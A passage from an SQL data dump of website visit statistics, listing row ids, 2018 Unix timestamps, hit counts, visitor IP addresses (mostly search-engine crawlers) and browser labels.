(280057,1533050664,1,1,0,0,'188.230.43.254','other'),(280058,1533050727,1,1,0,0,'37.9.113.134','other'),(280059,1533051184,1,1,0,0,'8.29.198.25','other'),(280060,1533051497,1,1,0,0,'185.58.206.80','firefox'),(280061,1533052076,2,0,2,0,'66.249.75.195',''),(280062,1533052107,1,1,0,0,'141.8.132.22','other'),(280063,1533052142,1,1,0,0,'40.77.167.148','other'),(280064,1533052320,3,3,0,0,'130.180.219.103','chrome'),(280065,1533052422,1,0,1,0,'66.249.75.201',''),(280066,1533052434,1,0,1,0,'66.249.75.199',''),(280067,1533052676,1,1,0,0,'141.8.142.152','other'),(280068,1533053048,1,1,0,0,'188.230.43.254','other'),(280069,1533053426,3,3,0,0,'216.244.66.241','other'),(280070,1533054025,1,0,1,0,'66.249.75.195',''),(280071,1533054319,1,0,1,0,'66.249.75.201',''),(280072,1533054425,2,0,2,0,'66.249.75.199',''),(280073,1533055152,1,1,0,0,'141.8.132.19','other'),(280074,1533055161,1,1,0,0,'178.154.200.7','other'),(280075,1533055260,8,8,0,0,'94.130.9.183','other'),(280076,1533055439,1,1,0,0,'37.9.113.134','other'),(280077,1533055442,1,1,0,0,'87.250.224.46','other'),(280078,1533055452,1,1,0,0,'188.230.43.254','other'),(280079,1533055660,1,1,0,0,'5.45.207.69','other'),(280080,1533055843,1,0,1,0,'66.249.75.195',''),(280081,1533055846,2,0,2,0,'66.249.69.156',''),(280082,1533055899,1,0,1,0,'66.249.69.158',''),(280083,1533056048,2,2,0,0,'216.244.66.241','other'),(280084,1533056056,2,1,1,0,'66.249.75.195',''),(280085,1533056147,1,1,0,0,'66.249.69.156','chrome'),(280086,1533056170,8,8,0,0,'94.130.9.183','other'),(280087,1533056175,1,1,0,0,'66.249.75.199','chrome'),(280088,1533056187,1,0,1,0,'66.249.69.157',''),(280089,1533056370,1,1,0,0,'37.9.113.74','other'),(280090,1533056383,1,1,0,0,'54.165.59.7','other'),(280091,1533056920,3,1,2,0,'66.249.75.195',''),(280092,1533056981,2,1,1,0,'66.249.75.201',''),(280093,1533057010,1,0,1,0,'66.249.69.158',''),(280094,1533057036,1,1,0,0,'37.9.113.60','other'),(280095,1533057073,2,2,0,0,'94.130.9.183','other'),(280096,1533057097,3,0,3,0,'66.249.75.199',''),(280097,1533057152,1,1,0,0,'37.9.113.138','other'),(280098,1533057160,1,1,0,0,'141.8.142.50','other'),(280099,1533057161,1,1,0,0,'91.196.178.72','firefox'),(280100,1533057180,3,1,2,0,'66.249.75.195',''),(280101,1533057283,2,1,1,0,'66.249.75.195',''),(280102,1533057368,5,5,0,0,'66.249.75.199','chrome'),(280103,1533057417,2,0,2,0,'66.249.69.157',''),(280104,1533057430,6,6,0,0,'66.249.75.195','chrome'),(280105,1533057481,1,1,0,0,'66.249.75.201','chrome'),(280106,1533057614,1,1,0,0,'66.249.69.156','chrome'),(280107,1533057676,1,1,0,0,'95.163.255.112','other'),(280108,1533058198,1,1,0,0,'188.230.43.254','other'),(280109,1533058453,1,1,0,0,'37.54.232.130','chrome'),(280110,1533058499,1,1,0,0,'40.77.167.148','other'),(280111,1533058560,1,0,1,0,'66.249.75.201',''),(280112,1533058565,3,3,0,0,'216.244.66.241','other'),(280113,1533058621,1,1,0,0,'193.200.248.131','other'),(280114,1533058807,1,1,0,0,'54.165.59.7','other'),(280115,1533059692,1,0,1,0,'66.249.69.157',''),(280116,1533059720,1,1,0,0,'141.8.142.74','other'),(280117,1533059750,1,1,0,0,'37.9.113.182','other'),(280118,1533059842,2,2,0,0,'178.154.171.88','other'),(280119,1533060051,1,0,1,0,'66.249.75.195',''),(280120,1533060127,1,0,1,0,'66.249.75.201',''),(280121,1533060260,1,1,0,0,'66.249.69.156','chrome'),(280122,1533060263,1,1,0,0,'66.249.75.199','chrome'),(280123,1533060600,1,1,0,0,'8.29.198.25','other'),(280124,1533060898,2,2,0,0,'141.8.142.74','other'),(280125,1533061150,1,1,0,0,'216.244.66.241','other'),(280126,1533061452,1,1,0,0,'66.249.75.201','chrome'),(280127,1533061539,1,1,0,0,'95.163.255.98','other'),(280128,1533062063,1,1,0,0,'8.29.198.26','other'),(280129,1533062786,1,1,0,0,'141.8.142.74','other'),(280130,1533064257,1,0,1,0,'66.249.75.199',''),(280131,1533064948,1,1,0,0,'95.24.207.73','chrome'),(280132,1533064985,1,1,0,0,'178.154.171.88','other'),(280133,1533066108,3,3,0,0,'141.8.142.74','other'),(280134,1533066493,1,1,0,0,'216.244.66.241','other'),(280135,1533067524,2,0,2,0,'66.249.75.201',''),(280136,1533067621,2,0,2,0,'66.249.69.156',''),(280137,1533067669,2,0,2,0,'66.249.75.199',''),(280138,1533067735,2,0,2,0,'66.249.75.195',''),(280139,1533067787,1,1,0,0,'141.8.142.74','other'),(280140,1533067883,2,1,1,0,'66.249.69.157',''),(280141,1533068084,1,1,0,0,'66.249.69.158','chrome'),(280142,1533068869,1,1,0,0,'87.250.224.46','other'),(280143,1533068986,2,2,0,0,'216.244.66.241','other'),(280144,1533069401,2,0,2,0,'66.249.75.201',''),(280145,1533070632,1,1,0,0,'141.8.142.74','other'),(280146,1533070776,1,1,0,0,'66.249.75.195','chrome'),(280147,1533071179,1,1,0,0,'216.244.66.241','other'),(280148,1533071450,1,1,0,0,'8.29.198.25','other'),(280149,1533071586,1,1,0,0,'120.138.23.117','chrome'),(280150,1533071624,2,2,0,0,'141.8.142.74','other'),(280151,1533072364,4,0,4,0,'66.249.75.199',''),(280152,1533072460,1,1,0,0,'95.163.255.95','other'),(280153,1533072505,2,0,2,0,'66.249.75.201',''),(280154,1533072929,1,1,0,0,'8.29.198.25','other'),(280155,1533073071,1,1,0,0,'178.154.171.88','other'),(280156,1533073309,2,0,2,0,'66.249.75.199',''),(280157,1533073620,1,1,0,0,'157.55.39.73','other'),(280158,1533073745,1,0,1,0,'66.249.75.195',''),(280159,1533073780,1,1,0,0,'66.249.69.157','chrome'),(280160,1533074331,1,1,0,0,'178.154.171.88','other'),(280161,1533074332,2,2,0,0,'216.244.66.241','other'),(280162,1533074915,2,0,2,0,'66.249.75.201',''),(280163,1533075243,1,1,0,0,'141.8.142.74','other'),(280164,1533075269,1,0,1,0,'66.249.75.199',''),(280165,1533075867,1,0,1,0,'66.249.75.195',''),(280166,1533075988,3,0,3,0,'66.249.75.201',''),(280167,1533076010,1,1,0,0,'141.8.132.22','other'),(280168,1533076016,1,1,0,0,'66.249.69.156','chrome'),(280169,1533076127,3,1,2,0,'66.249.75.199',''),(280170,1533076245,1,1,0,0,'95.163.255.96','other'),(280171,1533077035,2,0,2,0,'66.249.75.199',''),(280172,1533077169,1,0,1,0,'66.249.75.201',''),(280173,1533077211,2,0,2,0,'66.249.75.195',''),(280174,1533077545,1,1,0,0,'66.249.75.195','chrome'),(280175,1533077578,1,1,0,0,'95.163.255.178','other'),(280176,1533078037,2,2,0,0,'141.8.142.74','other'),(280177,1533078720,1,0,1,0,'66.249.75.201',''),(280178,1533079051,1,1,0,0,'66.249.69.158','chrome'),(280179,1533079790,1,1,0,0,'95.163.255.190','other'),(280180,1533079808,1,1,0,0,'178.154.171.88','other'),(280181,1533079876,1,1,0,0,'95.163.255.178','other'),(280182,1533080113,2,0,2,0,'66.249.75.201',''),(280183,1533080264,1,0,1,0,'66.249.75.195',''),(280184,1533080319,1,0,1,0,'66.249.75.199',''),(280185,1533080831,1,1,0,0,'5.45.207.58','other'),(280186,1533081573,1,0,1,0,'66.249.75.199',''),(280187,1533082141,1,1,0,0,'216.244.66.241','other'),(280188,1533082307,1,1,0,0,'8.29.198.27','other'),(280189,1533082435,1,1,0,0,'37.9.113.151','other'),(280190,1533082438,1,1,0,0,'178.154.171.88','other'),(280191,1533082658,1,0,1,0,'66.249.75.195',''),(280192,1533083222,1,0,1,0,'66.249.75.199',''),(280193,1533083252,1,1,0,0,'141.8.142.74','other'),(280194,1533083346,1,1,0,0,'5.45.207.58','other'),(280195,1533083361,1,1,0,0,'66.249.75.199','chrome'),(280196,1533083796,1,1,0,0,'8.29.198.27','other'),(280197,1533084213,1,1,0,0,'213.180.203.40','other'),(280198,1533084287,1,1,0,0,'95.163.255.173','other'),(280199,1533084396,5,1,4,0,'66.249.75.201',''),(280200,1533084556,1,0,1,0,'66.249.75.199',''),(280201,1533084592,2,0,2,0,'66.249.75.195',''),(280202,1533084914,1,1,0,0,'82.146.62.251','chrome'),(280203,1533085142,2,2,0,0,'141.8.142.74','other'),(280204,1533085511,1,1,0,0,'66.249.69.156','chrome'),(280205,1533085955,4,4,0,0,'40.77.167.148','other'),(280206,1533085960,3,3,0,0,'157.55.39.73','other'),(280207,1533085965,6,6,0,0,'157.55.39.46','other'),(280208,1533086094,4,4,0,0,'157.55.39.74','other'),(280209,1533086251,1,1,0,0,'95.163.255.173','other'),(280210,1533086787,1,0,1,0,'66.249.66.156',''),(280211,1533086803,1,0,1,0,'66.249.66.155',''),(280212,1533087674,1,1,0,0,'141.8.142.74','other'),(280213,1533088320,1,1,0,0,'52.34.24.33','chrome'),(280214,1533088519,1,1,0,0,'13.66.185.4','other'),(280215,1533089258,1,1,0,0,'141.8.142.74','other'),(280216,1533089608,2,2,0,0,'216.244.66.241','other'),(280217,1533089642,1,0,1,0,'66.249.66.156',''),(280218,1533090430,1,1,0,0,'193.161.14.190','firefox'),(280219,1533090654,3,0,3,0,'66.249.66.155',''),(280220,1533091012,14,14,0,0,'195.201.35.76','other'),(280221,1533092469,1,1,0,0,'216.244.66.241','other'),(280222,1533092637,2,1,1,0,'66.249.66.156',''),(280223,1533092864,3,0,3,0,'66.249.66.155',''),(280224,1533092906,1,1,0,0,'95.134.213.170','firefox'),(280225,1533093150,1,1,0,0,'8.29.198.27','other'),(280226,1533093372,1,0,1,0,'66.249.66.157',''),(280227,1533093602,1,0,1,0,'66.249.66.57',''),(280228,1533094273,1,1,0,0,'178.154.171.88','other'),(280229,1533094467,3,0,3,0,'66.249.66.157',''),(280230,1533094588,3,0,3,0,'66.249.66.156',''),(280231,1533094652,1,1,0,0,'8.29.198.27','other'),(280232,1533095122,3,0,3,0,'66.249.66.155',''),(280233,1533095160,1,1,0,0,'66.249.66.61','chrome'),(280234,1533095497,1,1,0,0,'141.8.142.74','other'),(280235,1533095577,1,1,0,0,'87.250.224.46','other'),(280236,1533096045,1,0,1,0,'66.249.66.157',''),(280237,1533096120,1,0,1,0,'66.249.66.155',''),(280238,1533096134,2,0,2,0,'66.249.66.156',''),(280239,1533096579,1,1,0,0,'13.66.185.4','other'),(280240,1533097155,1,0,1,0,'66.249.66.155',''),(280241,1533097167,1,0,1,0,'66.249.66.61',''),(280242,1533097270,1,1,0,0,'141.8.142.74','other'),(280243,1533097491,2,0,2,0,'66.249.66.156',''),(280244,1533097713,1,1,0,0,'216.244.66.241','other'),(280245,1533098067,35,35,0,0,'5.9.151.57','other'),(280246,1533098120,3,1,2,0,'66.249.66.157',''),(280247,1533098794,1,1,0,0,'178.154.171.88','other'),(280248,1533098914,2,0,2,0,'66.249.66.155',''),(280249,1533098915,11,11,0,0,'5.188.211.10','msie'),(280250,1533099052,2,2,0,0,'95.213.141.126','opera'),(280251,1533099125,3,0,3,0,'66.249.66.156',''),(280252,1533099128,1,0,1,0,'66.249.66.157',''),(280253,1533099754,1,1,0,0,'178.154.171.88','other'),(280254,1533100132,1,1,0,0,'66.249.66.59','chrome'),(280255,1533100918,1,1,0,0,'141.8.142.74','other'),(280256,1533101134,2,0,2,0,'66.249.66.157',''),(280257,1533101626,1,0,1,0,'66.249.66.155',''),(280258,1533101770,1,1,0,0,'178.154.171.88','other'),(280259,1533101803,2,0,2,0,'66.249.66.156',''),(280260,1533101914,1,1,0,0,'91.196.178.172','chrome'),(280261,1533102143,1,0,1,0,'66.249.66.157',''),(280262,1533102165,2,2,0,0,'216.244.66.241','other'),(280263,1533103079,2,2,0,0,'216.244.66.241','other'),(280264,1533103620,2,0,2,0,'66.249.66.155',''),(280265,1533103776,1,0,1,0,'66.249.66.156',''),(280266,1533103999,1,1,0,0,'8.29.198.25','other'),(280267,1533104036,1,1,0,0,'82.145.208.246','other'),(280268,1533104042,1,1,0,0,'66.249.66.155','chrome'),(280269,1533104293,1,1,0,0,'141.8.142.74','other'),(280270,1533104295,1,1,0,0,'31.13.113.80','other'),(280271,1533104309,1,1,0,0,'31.13.126.76','other'),(280272,1533104324,1,1,0,0,'173.252.99.182','other'),(280273,1533104400,1,1,0,0,'92.113.189.235','chrome'),(280274,1533104923,1,1,0,0,'66.102.9.40','chrome'),(280275,1533105168,2,2,0,0,'91.196.178.169','chrome'),(280276,1533105179,2,0,2,0,'66.249.66.155',''),(280277,1533105341,5,5,0,0,'216.244.66.241','other'),(280278,1533105392,1,0,1,0,'66.249.66.57',''),(280279,1533105433,2,0,2,0,'66.249.66.157',''),(280280,1533105505,1,1,0,0,'8.29.198.25','other'),(280281,1533105746,1,0,1,0,'66.249.66.156',''),(280282,1533106009,1,1,0,0,'91.196.178.189','chrome'),(280283,1533106105,1,1,0,0,'91.196.178.134','chrome'),(280284,1533106121,1,1,0,0,'185.158.112.102','firefox'),(280285,1533106350,1,1,0,0,'91.196.178.169','chrome'),(280286,1533106542,2,2,0,0,'91.196.178.75','chrome'),(280287,1533106582,2,2,0,0,'213.180.203.40','other'),(280288,1533106590,1,0,1,0,'66.249.66.157',''),(280289,1533106619,2,2,0,0,'91.196.178.80','chrome'),(280290,1533106826,1,1,0,0,'157.55.39.210','other'),(280291,1533106933,1,1,0,0,'31.13.114.7','other'),(280292,1533107001,1,1,0,0,'37.9.113.151','other'),(280293,1533107093,1,0,1,0,'66.249.66.156',''),(280294,1533107408,1,1,0,0,'91.196.177.193','chrome'),(280295,1533107585,1,1,0,0,'95.133.194.181','chrome'),(280296,1533107736,1,1,0,0,'207.46.13.36','other'),(280297,1533107870,2,0,2,0,'66.249.66.157',''),(280298,1533108024,1,1,0,0,'5.45.207.49','other'),(280299,1533108163,1,0,1,0,'66.249.66.61',''),(280300,1533108369,1,1,0,0,'216.244.66.241','other'),(280301,1533108431,1,1,0,0,'91.196.178.169','chrome'),(280302,1533108487,2,0,2,0,'66.249.66.155',''),(280303,1533109194,1,0,1,0,'66.249.66.157',''),(280304,1533109232,2,2,0,0,'91.196.178.187','chrome'),(280305,1533109530,1,1,0,0,'87.250.224.46','other'),(280306,1533109629,1,1,0,0,'178.154.171.88','other'),(280307,1533109807,1,1,0,0,'91.196.178.134','firefox'),(280308,1533109833,1,0,1,0,'66.249.66.155',''),(280309,1533109868,1,1,0,0,'95.132.2.161','firefox'),(280310,1533110002,2,2,0,0,'216.244.66.241','other'),(280311,1533110077,2,0,2,0,'66.249.66.61',''),(280312,1533110278,2,2,0,0,'141.8.142.74','other'),(280313,1533110310,2,0,2,0,'66.249.66.156',''),(280314,1533110794,1,0,1,0,'66.249.66.57',''),(280315,1533110933,1,1,0,0,'216.244.66.241','other'),(280316,1533111226,1,1,0,0,'157.55.39.210','other'),(280317,1533111307,1,1,0,0,'178.154.171.88','other'),(280318,1533111369,2,2,0,0,'141.8.142.74','other'),(280319,1533111381,1,1,0,0,'93.170.115.83','chrome'),(280320,1533111869,2,0,2,0,'66.249.66.157',''),(280321,1533111886,2,2,0,0,'93.183.224.86','chrome'),(280322,1533112091,1,1,0,0,'46.211.157.171','chrome'),(280323,1533112217,2,0,2,0,'66.249.66.155',''),(280324,1533112302,1,1,0,0,'91.196.178.80','chrome'),(280325,1533112334,5,0,5,0,'66.249.66.156',''),(280326,1533112377,1,0,1,0,'66.249.66.57',''),(280327,1533112429,1,1,0,0,'178.95.66.69','chrome'),(280328,1533112771,2,0,2,0,'66.249.66.157',''),(280329,1533112870,1,1,0,0,'66.249.66.61','chrome'),(280330,1533112925,1,1,0,0,'66.249.66.155','chrome'),(280331,1533113085,1,1,0,0,'141.8.142.74','other'),(280332,1533113584,1,1,0,0,'193.104.35.105','firefox'),(280333,1533113642,1,1,0,0,'178.154.171.88','other'),(280334,1533113684,2,2,0,0,'91.196.178.104','chrome'),(280335,1533113698,1,1,0,0,'216.244.66.241','other'),(280336,1533113779,1,1,0,0,'146.185.158.24','chrome'),(280337,1533114269,2,0,2,0,'66.249.66.156',''),(280338,1533114363,1,1,0,0,'92.113.75.151','chrome'),(280339,1533114424,1,0,1,0,'66.249.66.155',''),(280340,1533114845,1,1,0,0,'8.29.198.26','other'),(280341,1533115213,1,1,0,0,'180.76.15.138','other'),(280342,1533115823,1,1,0,0,'141.8.142.74','other'),(280343,1533115833,2,2,0,0,'216.244.66.241','other'),(280344,1533116378,1,1,0,0,'8.29.198.26','other'),(280345,1533116457,1,1,0,0,'91.196.178.80','chrome'),(280346,1533116621,1,0,1,0,'66.249.66.155',''),(280347,1533116630,2,2,0,0,'130.180.219.107','chrome'),(280348,1533116835,3,3,0,0,'91.196.178.169','chrome'),(280349,1533117627,1,1,0,0,'69.171.252.11','other'),(280350,1533117629,1,1,0,0,'193.200.248.101','other'),(280351,1533117656,1,0,1,0,'66.249.66.155',''),(280352,1533117684,1,1,0,0,'141.8.142.74','other'),(280353,1533117820,1,1,0,0,'207.46.13.39','other'),(280354,1533117844,5,0,5,0,'66.249.66.156',''),(280355,1533118192,1,1,0,0,'66.249.66.59','chrome'),(280356,1533118197,1,1,0,0,'66.249.66.155','chrome'),(280357,1533118338,2,2,0,0,'178.154.171.88','other'),(280358,1533118358,1,1,0,0,'94.178.207.235','chrome'),(280359,1533118651,3,3,0,0,'216.244.66.241','other'),(280360,1533118903,1,1,0,0,'69.171.224.208','other'),(280361,1533118948,3,3,0,0,'46.4.60.249','other'),(280362,1533119639,1,0,1,0,'66.249.66.155',''),(280363,1533119831,2,2,0,0,'199.58.86.206','other'),(280364,1533120171,1,1,0,0,'141.8.142.74','other'),(280365,1533120383,1,1,0,0,'178.93.184.153','chrome'),(280366,1533120661,1,1,0,0,'54.36.148.70','other'),(280367,1533120773,1,1,0,0,'54.36.148.24','other'),(280368,1533120775,1,1,0,0,'54.36.148.63','other'),(280369,1533120839,1,1,0,0,'54.36.148.134','other'),(280370,1533120911,1,1,0,0,'82.207.116.219','chrome'),(280371,1533120978,1,1,0,0,'157.55.39.210','other'),(280372,1533120999,1,1,0,0,'54.36.148.107','other'),(280373,1533121002,1,1,0,0,'54.36.148.81','other'),(280374,1533121020,1,1,0,0,'54.36.149.22','other'),(280375,1533121176,3,0,3,0,'66.249.66.155',''),(280376,1533121313,6,6,0,0,'216.244.66.241','other'),(280377,1533121402,3,0,3,0,'66.249.66.156',''),(280378,1533121476,1,1,0,0,'54.36.149.106','other'),(280379,1533121627,1,1,0,0,'54.36.148.69','other'),(280380,1533121775,1,0,1,0,'66.249.66.157',''),(280381,1533121810,1,1,0,0,'207.46.13.38','other'),(280382,1533121986,1,1,0,0,'141.8.142.74','other'),(280383,1533122183,1,1,0,0,'54.36.148.142','other'),(280384,1533122228,1,1,0,0,'54.36.148.245','other'),(280385,1533122291,1,0,1,0,'66.249.66.59',''),(280386,1533122338,1,1,0,0,'207.46.13.39','other'),(280387,1533122560,1,1,0,0,'54.36.148.115','other'),(280388,1533122840,1,1,0,0,'54.36.149.25','other'),(280389,1533122904,1,1,0,0,'54.36.148.83','other'),(280390,1533122924,2,0,2,0,'66.249.66.155',''),(280391,1533123075,1,1,0,0,'54.36.148.224','other'),(280392,1533123457,2,0,2,0,'66.249.66.156',''),(280393,1533123536,1,1,0,0,'54.36.149.37','other'),(280394,1533123681,1,1,0,0,'54.36.148.96','other'),(280395,1533123747,1,1,0,0,'54.36.149.100','other'),(280396,1533123983,1,1,0,0,'54.36.148.166','other'),(280397,1533124034,2,2,0,0,'216.244.66.241','other'),(280398,1533124070,1,1,0,0,'54.36.148.249','other'),(280399,1533124173,1,1,0,0,'91.196.178.169','chrome'),(280400,1533124276,1,1,0,0,'54.36.149.57','other'),(280401,1533124509,1,1,0,0,'54.36.148.34','other'),(280402,1533124531,1,1,0,0,'54.36.149.8','other'),(280403,1533124625,2,0,2,0,'66.249.66.155',''),(280404,1533124639,1,0,1,0,'66.249.66.156',''),(280405,1533124758,1,1,0,0,'54.36.148.209','other'),(280406,1533124763,1,1,0,0,'194.44.45.139','chrome'),(280407,1533124868,1,1,0,0,'54.36.148.72','other'),(280408,1533125001,1,1,0,0,'54.36.148.15','other'),(280409,1533125070,1,1,0,0,'54.36.148.65','other'),(280410,1533125079,1,1,0,0,'54.36.148.210','other'),(280411,1533125172,1,1,0,0,'54.36.148.251','other'),(280412,1533125238,1,1,0,0,'54.36.148.252','other'),(280413,1533125345,1,1,0,0,'54.36.149.97','other'),(280414,1533125516,1,1,0,0,'66.249.66.59','chrome'),(280415,1533125518,1,1,0,0,'66.249.66.156','chrome'),(280416,1533125611,1,1,0,0,'95.134.41.98','chrome'),(280417,1533125705,1,1,0,0,'8.29.198.26','other'),(280418,1533125722,1,1,0,0,'91.196.178.80','chrome'),(280419,1533125733,1,1,0,0,'54.36.149.13','other'),(280420,1533125754,1,1,0,0,'54.36.148.160','other'),(280421,1533125763,1,1,0,0,'54.36.148.248','other'),(280422,1533125831,1,1,0,0,'54.36.148.62','other'),(280423,1533125898,1,1,0,0,'87.250.224.46','other'),(280424,1533126087,1,1,0,0,'141.8.142.74','other'),(280425,1533126169,1,1,0,0,'54.36.148.245','other'),(280426,1533126226,1,1,0,0,'54.36.148.57','other'),(280427,1533126260,1,1,0,0,'54.36.149.73','other'),(280428,1533126261,1,1,0,0,'54.36.148.122','other'),(280429,1533126532,1,1,0,0,'95.163.255.93','other'),(280430,1533126585,3,0,3,0,'66.249.66.156',''),(280431,1533126758,1,1,0,0,'54.36.148.206','other'),(280432,1533126760,1,1,0,0,'54.36.149.100','other'),(280433,1533126855,1,1,0,0,'176.105.216.241','chrome'),(280434,1533126879,1,1,0,0,'54.36.149.58','other'),(280435,1533126923,1,1,0,0,'216.244.66.241','other'),(280436,1533126964,1,1,0,0,'54.36.148.66','other'),(280437,1533127114,1,0,1,0,'66.249.66.157',''),(280438,1533127252,1,1,0,0,'8.29.198.25','other'),(280439,1533127408,1,1,0,0,'54.36.149.9','other'),(280440,1533127710,1,1,0,0,'54.36.148.68','other'),(280441,1533127741,1,1,0,0,'94.178.159.140','chrome'),(280442,1533127764,1,1,0,0,'91.196.178.81','firefox'),(280443,1533127882,1,1,0,0,'52.53.201.78','chrome'),(280444,1533127908,1,1,0,0,'91.196.178.169','chrome'),(280445,1533128035,1,1,0,0,'54.36.148.122','other'),(280446,1533128042,1,1,0,0,'54.36.149.14','other'),(280447,1533128080,1,1,0,0,'54.36.148.43','other'),(280448,1533128113,1,1,0,0,'54.36.148.56','other'),(280449,1533128149,1,1,0,0,'54.36.148.161','other'),(280450,1533128245,1,1,0,0,'87.250.224.46','other'),(280451,1533128255,1,1,0,0,'54.36.148.170','other'),(280452,1533128342,1,0,1,0,'66.249.66.156',''),(280453,1533128361,1,1,0,0,'54.36.148.245','other'),(280454,1533128535,1,1,0,0,'54.36.149.8','other'),(280455,1533128635,1,1,0,0,'54.36.149.49','other'),(280456,1533128698,1,0,1,0,'66.249.66.157',''),(280457,1533128834,2,2,0,0,'91.196.178.161','chrome'),(280458,1533128873,2,0,2,0,'66.249.66.155',''),(280459,1533129081,1,1,0,0,'54.36.148.75','other'),(280460,1533129272,1,1,0,0,'130.180.219.107','chrome'),(280461,1533129293,1,1,0,0,'54.36.149.33','other'),(280462,1533129338,1,1,0,0,'54.36.148.21','other'),(280463,1533129355,1,1,0,0,'95.163.255.105','other'),(280464,1533129368,1,1,0,0,'54.36.148.111','other'),(280465,1533129369,1,1,0,0,'54.36.149.96','other'),(280466,1533129382,1,1,0,0,'54.36.149.55','other'),(280467,1533129572,1,1,0,0,'80.84.184.46','chrome'),(280468,1533129597,1,1,0,0,'54.36.149.86','other'),(280469,1533129612,1,1,0,0,'54.36.148.189','other'),(280470,1533129748,1,1,0,0,'54.36.148.100','other'),(280471,1533129912,1,1,0,0,'54.36.148.221','other'),(280472,1533129963,1,1,0,0,'157.55.39.210','other'),(280473,1533129998,1,1,0,0,'54.36.148.140','other'),(280474,1533130062,1,1,0,0,'178.154.171.88','other'),(280475,1533130156,2,2,0,0,'141.8.142.74','other'),(280476,1533130205,1,1,0,0,'54.36.148.218','other'),(280477,1533130297,1,1,0,0,'37.54.58.57','chrome'),(280478,1533130300,1,1,0,0,'54.36.148.164','other'),(280479,1533130330,1,1,0,0,'54.36.148.21','other'),(280480,1533130497,1,1,0,0,'54.36.149.84','other'),(280481,1533130587,2,0,2,0,'66.249.66.156',''),(280482,1533130833,1,1,0,0,'54.36.148.144','other'),(280483,1533130954,1,1,0,0,'54.36.148.154','other'),(280484,1533131296,1,1,0,0,'54.36.148.15','other'),(280485,1533131301,1,1,0,0,'54.36.148.54','other'),(280486,1533131303,1,1,0,0,'212.111.198.100','chrome'),(280487,1533131324,24,0,24,0,'66.249.66.155',''),(280488,1533131367,1,0,1,0,'66.249.66.57',''),(280489,1533131439,1,1,0,0,'31.43.31.178','chrome'),(280490,1533131506,1,1,0,0,'54.36.149.56','other'),(280491,1533131636,1,1,0,0,'54.36.149.16','other'),(280492,1533131706,1,1,0,0,'141.8.142.74','other'),(280493,1533131753,1,1,0,0,'54.36.148.80','other'),(280494,1533131816,1,1,0,0,'66.249.66.61','chrome'),(280495,1533131871,1,1,0,0,'54.36.149.29','other'),(280496,1533132079,2,0,2,0,'66.249.66.157',''),(280497,1533132081,9,0,9,0,'66.249.66.156',''),(280498,1533132154,1,1,0,0,'66.249.66.155','chrome'),(280499,1533132171,1,1,0,0,'54.36.148.78','other'),(280500,1533132196,1,1,0,0,'54.36.148.108','other'),(280501,1533132296,1,1,0,0,'54.36.148.216','other'),(280502,1533132462,1,1,0,0,'180.76.15.24','other'),(280503,1533132832,1,1,0,0,'66.249.66.156','chrome'),(280504,1533133143,1,1,0,0,'54.36.149.48','other'),(280505,1533133230,4,4,0,0,'89.184.68.26','other'),(280506,1533133257,2,2,0,0,'91.196.178.76','chrome'),(280507,1533133428,1,1,0,0,'80.84.184.46','chrome'),(280508,1533133631,1,1,0,0,'54.36.149.62','other'),(280509,1533133686,1,1,0,0,'194.187.170.120','other'),(280510,1533133760,1,1,0,0,'54.36.148.74','other'),(280511,1533133878,1,1,0,0,'66.249.66.156','chrome'),(280512,1533133907,1,1,0,0,'54.36.148.208','other'),(280513,1533134060,1,1,0,0,'54.36.149.5','other'),(280514,1533134181,1,1,0,0,'54.36.148.126','other'),(280515,1533134207,1,1,0,0,'54.36.148.149','other'),(280516,1533134370,1,1,0,0,'54.36.149.42','other'),(280517,1533134414,1,1,0,0,'54.36.148.224','other'),(280518,1533134468,1,1,0,0,'54.36.148.166','other'),(280519,1533134583,1,1,0,0,'54.36.148.214','other'),(280520,1533134593,1,1,0,0,'141.8.142.74','other'),(280521,1533134877,1,1,0,0,'54.36.148.107','other'),(280522,1533134918,1,1,0,0,'54.36.148.105','other'),(280523,1533135206,1,1,0,0,'54.36.149.48','other'),(280524,1533135285,1,1,0,0,'54.36.148.161','other'),(280525,1533135315,1,1,0,0,'54.36.148.34','other'),(280526,1533135410,1,1,0,0,'54.36.148.225','other'),(280527,1533135498,1,1,0,0,'54.36.149.88','other'),(280528,1533135615,1,1,0,0,'54.36.148.178','other'),(280529,1533135633,1,1,0,0,'54.36.148.78','other'),(280530,1533135653,1,0,1,0,'66.249.66.156',''),(280531,1533135689,1,1,0,0,'54.36.149.50','other'),(280532,1533135762,1,1,0,0,'54.36.149.97','other'),(280533,1533135954,1,1,0,0,'54.36.148.35','other'),(280534,1533135973,1,1,0,0,'54.36.149.39','other'),(280535,1533136188,1,1,0,0,'54.36.148.96','other'),(280536,1533136474,1,1,0,0,'54.36.149.19','other'),(280537,1533136576,1,1,0,0,'8.29.198.26','other'),(280538,1533136630,1,1,0,0,'54.36.148.239','other'),(280539,1533136755,1,1,0,0,'54.36.149.13','other'),(280540,1533136842,1,1,0,0,'54.36.148.205','other'),(280541,1533136869,1,1,0,0,'54.36.148.85','other'),(280542,1533136918,4,4,0,0,'216.244.66.241','other'),(280543,1533136950,1,1,0,0,'54.36.148.217','other'),(280544,1533137134,1,1,0,0,'54.36.148.94','other'),(280545,1533137140,1,1,0,0,'54.36.148.47','other'),(280546,1533137349,1,1,0,0,'188.230.43.254','other'),(280547,1533137449,1,1,0,0,'54.36.148.245','other'),(280548,1533137473,1,1,0,0,'54.36.148.156','other'),(280549,1533137854,1,1,0,0,'66.249.66.156','chrome'),(280550,1533137937,1,1,0,0,'54.36.148.219','other'),(280551,1533138124,1,1,0,0,'8.29.198.25','other'),(280552,1533138215,1,1,0,0,'54.36.148.88','other'),(280553,1533138409,1,1,0,0,'54.36.148.115','other'),(280554,1533138446,1,1,0,0,'54.36.148.95','other'),(280555,1533138456,1,1,0,0,'37.54.163.3','chrome'),(280556,1533138566,1,1,0,0,'54.36.149.69','other'),(280557,1533138603,1,1,0,0,'188.230.43.254','other'),(280558,1533138676,1,1,0,0,'54.36.148.84','other'),(280559,1533138681,1,1,0,0,'54.36.149.1','other'),(280560,1533138719,1,1,0,0,'54.36.149.50','other'),(280561,1533138901,1,1,0,0,'54.36.149.71','other'),(280562,1533138903,1,1,0,0,'54.36.149.97','other'),(280563,1533138924,1,1,0,0,'54.36.148.244','other'),(280564,1533139033,1,1,0,0,'54.36.149.2','other'),(280565,1533139094,1,1,0,0,'178.154.171.88','other'),(280566,1533139134,1,1,0,0,'54.36.148.195','other'),(280567,1533139159,1,1,0,0,'54.36.148.109','other'),(280568,1533139394,1,1,0,0,'54.36.149.51','other'),(280569,1533139466,1,1,0,0,'54.36.148.105','other'),(280570,1533139570,1,1,0,0,'54.36.148.117','other'),(280571,1533139600,1,1,0,0,'54.36.149.1','other'),(280572,15